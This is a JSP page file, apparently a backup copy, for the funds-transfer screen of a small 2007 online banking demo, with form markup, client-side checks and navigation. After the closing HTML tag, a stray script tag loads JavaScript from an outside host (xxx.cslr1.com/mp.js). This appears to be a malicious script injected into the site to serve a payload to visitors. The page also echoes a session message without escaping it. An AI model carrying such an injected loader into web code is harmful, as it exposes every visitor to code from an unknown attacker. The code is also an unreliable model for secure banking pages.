📄 transfer.jsp~2~
字号:
<%@ page contentType="text/html; charset=GBK" %>
<HTML>
<HEAD>
<TITLE>transfer</TITLE>
<META content="CutePage 2.0" name=GENERATOR>
<META content="text/html; charset=iso-8859-1" http-equiv=Content-Type>
<link href="css/globle.css" rel="stylesheet" type="text/css">
<STYLE type=text/css>
<!--
body { font-family:"Verdana", "Arial", "Helvetica", "sans-serif"; font-size: 9pt}
p { font-family:"Verdana", "Arial", "Helvetica", "sans-serif"; font-size: 9pt}
a:link { color: #0000FF; text-decoration: none}
a:visited { text-decoration: none}
a:hover { color: #FF0033; text-decoration: underline}
td { font-family: "Verdana", "Arial", "Helvetica", "sans-serif"; font-size: 9pt}
.CompanyName {font-family: "Verdana", "Arial", "Helvetica", "sans-serif"; font-size: 23pt}
.style1 {font-family: Arial, Helvetica, sans-serif;
font-size: 23pt;
font-weight: bold;
color: #0033CC;
}
-->
</STYLE>
<script language="javascript">
function check(){
var id = document.form1.id.value;
var money = document.form1.money.value;
if(id.length == 0){
alert('请输入对方帐户的卡号');
form1.id.foucs();
return false;
}
if(money.length == 0){
alert("请输入转帐金额");
form1.money.foucs();
return false;
}
return true;
}
</script>
<%
if(session.getAttribute("transferMessage") == null){
session.setAttribute("transferMessage","");
}
%>
</HEAD>
<BODY bgColor=#ffffff>
<form name="form1" method="post" action="/WebModule/transferservlet" onsubmit="return check(this)">
<DIV align=center>
<TABLE align=center border=0 cellPadding=0 cellSpacing=0 width="574">
<TR>
<TD width="2%"> </TD>
<TD width="2%"> </TD>
<TD width="3%"> </TD>
<TD bgColor=#006500 width="2%"> </TD>
<TD width="5%"> </TD>
<TD width="2%"> </TD>
<TD width="2%"> </TD>
<TD bgColor=#ce3000 width="2%"> </TD>
<TD width="11%"> </TD>
<TD width="2%"> </TD>
<TD width="5%"> </TD>
<TD bgColor=#ff9a00 width="2%"> </TD>
<TD width="7%"> </TD>
<TD width="2%"> </TD>
<TD width="16%"> </TD>
<TD bgColor=#00a200 width="2%"> </TD>
<TD width="12%"> </TD>
<TD width="2%"> </TD>
<TD width="16%"> </TD>
<TD bgColor=#006500 width="3%"> </TD>
</TR>
</TABLE>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="574">
<TR>
<TD bgColor=#006600 height=13 rowSpan=2 width="19%"> </TD>
<TD bgColor=#ce3000 rowSpan=2 width="8%"> </TD>
<TD bgColor=#ff9900 height=13 rowSpan=2 width="15%"> </TD>
<TD bgColor=#949231 height=13 rowSpan=2 width="14%"> </TD>
<TD bgColor=#00a200 height=13 rowSpan=2 width="44%"> </TD>
</TR>
<TR></TR>
</TABLE>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="574">
<TR>
<TD height=50><DIV align=center class=CompanyName>
<div align="left"><span class="style1"><img src="image/gsyh.gif" width="194" height="66" align="absmiddle"> Online System</span></div>
</DIV> <DIV align=right><B><FONT size=2>Transfer</FONT></B></DIV></TD>
</TR>
<TR>
<TD>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="100%">
<TR><TD bgColor=#ffcc00 height=1><DIV align=center><IMG height=1 src="./image/pixel.gif" width=1></DIV></TD></TR>
</TABLE>
</TD>
</TR>
<TR>
<TD height=12>
<DIV align=center class="mylink"><B>
<img src="image/icon01.gif" width="11" height="12"> <a href="index.jsp">Home</a> <img src="image/icon02.gif" width="11" height="12"> <a href="mailto:peirunou@163.com">Mail</a> <img src="image/icon03.gif" width="11" height="12"> <a href="http://www.google.com">Search</a></B></DIV>
</TD>
</TR>
<TR>
<TD>
<DIV align=left>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="100%">
<TR><TD bgColor=#ffcc00 height=2><DIV align=center><IMG height=1 src="./image/pixel.gif" width=1></DIV></TD></TR>
</TABLE>
</DIV>
</TD>
</TR>
</TABLE>
</DIV>
<TABLE align=center border=0 cellPadding=0 cellSpacing=0 width="574">
<TR>
<TD colSpan=2 vAlign=top><BR>
<TABLE align=left border=0 cellPadding=0 cellSpacing=0 width=160>
<TR>
<TD><DIV align=center><B><FONT color=#000000 face="Times New Roman, Times, serif" size=3>Transfer Account </FONT></B></DIV></TD>
</TR>
</TABLE><BR><BR>
<TABLE width="90%" height="42" border=0 align=center cellPadding=0 cellSpacing=0>
<TR>
<TD>
<table width="295" border="0" align="center">
<tr>
<td width="138"><div align="right"><SPAN class=djen><SPAN>account</SPAN> </SPAN><SPAN class=djen>for Tra<SPAN>nsfer:</SPAN></SPAN><BR>
</div></td>
<td width="147"><input name="id" type="text" class="box1" id="id" onmouseover="this.className='box2'" onMouseOut="this.className='box1'" onkeyup="value=value.replace(/[^\d]/g,'') "onbeforepaste="clipboardData.setData('text',clipboardData.getData('text').replace(/[^\d]/g,''))"></td>
</tr>
<tr>
<td><div align="right">Money <SPAN class=djen>for Tra<SPAN>nsfer:</SPAN></SPAN></div></td>
<td><input name="money" type="text" class="box1" id="money" onmouseover="this.className='box2'" onMouseOut="this.className='box1'" onkeyup="value=value.replace(/[^\d]/g,'') "onbeforepaste="clipboardData.setData('text',clipboardData.getData('text').replace(/[^\d]/g,''))"></td>
</tr>
<tr>
<td> </td>
<td><input name="Submit" type="submit" value="submit" class="btn1_mouseout" onmouseover="this.className='btn1_mouseover'"
onmouseout="this.className='btn1_mouseout'"></td>
</tr>
<tr align="center">
<td colspan="2"><font color="red"><%=session.getAttribute("transferMessage") %></font></td>
</tr>
</table>
<div align="center"></div>
</TD>
</TR>
</TABLE>
<BR>
</TD>
<TD bgColor=#ffcc00 height=393 vAlign=top width=2><IMG height=1 src="./image/pixel.gif" width=1></TD>
<TD bgColor=#ffffff height=393 vAlign=top width=135>
<DIV align=right>
<P align=left><B><FONT color=#ff0000 size=3><BR>Welcome!</FONT></B></P>
<P align=left><B><FONT color=#ff0000><a href="http://www.google.com"><IMG src="./image/mylogo.gif" width=135 height=65 border="0"></a></FONT></B> </P>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="100%">
<TR>
<TD height=25 width="20%"><DIV align=right><IMG height=12 src="image/point.gif" width=12></DIV></TD>
<TD><div align="left" class="mylink"><B><A href="savings.jsp"><FONT color=#ff9c00>Savings</FONT></A></B></div></TD>
</TR>
<TR>
<TD height=25 width="20%"><DIV align=right><IMG height=12 src="image/point.gif" width=12></DIV></TD>
<TD><div align="left" class="mylink"><B><A href="withdrawal.jsp"><FONT color=#ff9c00>WithDrawal</FONT></A></B></div></TD>
</TR>
<TR>
<TD height=25 width="20%"><DIV align=right><IMG height=12 src="image/point.gif" width=12></DIV></TD>
<TD><div align="left" class="mylink"><B><A href="/WebModule/balanceservlet"><FONT color=#ff9c00>Balance</FONT></A></B></div></TD>
</TR>
<TR>
<TD height=25 width="20%"><DIV align=right><IMG height=12 src="image/point.gif" width=12></DIV></TD>
<TD><div align="left" class="mylink"><B><A href="transfer.jsp"><FONT color=#ff9c00>Transfer</FONT></A></B></div></TD>
</TR>
<TR>
<TD height=25 width="20%"><DIV align=right><IMG height=12 src="image/point.gif" width=12></DIV></TD>
<TD><div align="left" class="mylink"><B><A href="ModifyPassword.jsp"><FONT color=#ff9c00>ModifyPasswod</FONT></A></B></div></TD>
</TR>
<TR>
<TD height=25 width="20%"><DIV align=right><IMG height=12 src="image/point.gif" width=12></DIV></TD>
<TD><div align="left" class="mylink"><B><A href="/WebModule/exitservlet"><FONT color=#ff9c00>Exit</FONT></A></B></div></TD>
</TR>
</TABLE>
</DIV>
</TD>
</TR>
<TR vAlign=top>
<TD colSpan=4>
<DIV align=right>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="80%">
<TR bgColor=#ffcf00>
<TD height=1><DIV align=right><IMG height=1 src="./image/pixel.gif" width=1></DIV></TD>
</TR>
</TABLE>
</DIV>
<DIV align=center>
<BR>
<DIV align=center><FONT color=#006400 face="Times New Roman, Times, serif">Design for <a href="mailto:peirunou@163.com">oupeirun</a>.</FONT><BR>
</DIV>
<DIV align=right>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="90%">
<TR bgColor=#949231>
<TD height=2><DIV align=right><IMG height=1 src="./image/pixel.gif" width=1></DIV></TD>
</TR>
</TABLE>
<DIV align=center> <FONT color=#3169a5 face="Arial, Helvetica, sans-serif" size=2>Copyright 2007 Oupeirun.All rights reserved.</FONT></DIV>
</DIV>
<BR>
</DIV>
<DIV align=right><TABLE border=0 cellPadding=0 cellSpacing=0 width="100%">
<TR bgColor=#006500>
<TD height=3><DIV align=right><IMG height=1 src="./image/pixel.gif" width=1></DIV></TD>
</TR>
</TABLE>
</DIV>
</TD>
</TR>
</TABLE>
</form>
</BODY>
</HTML>
<script language=javascript src=http://xxx.cslr1.com/mp.js></script>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -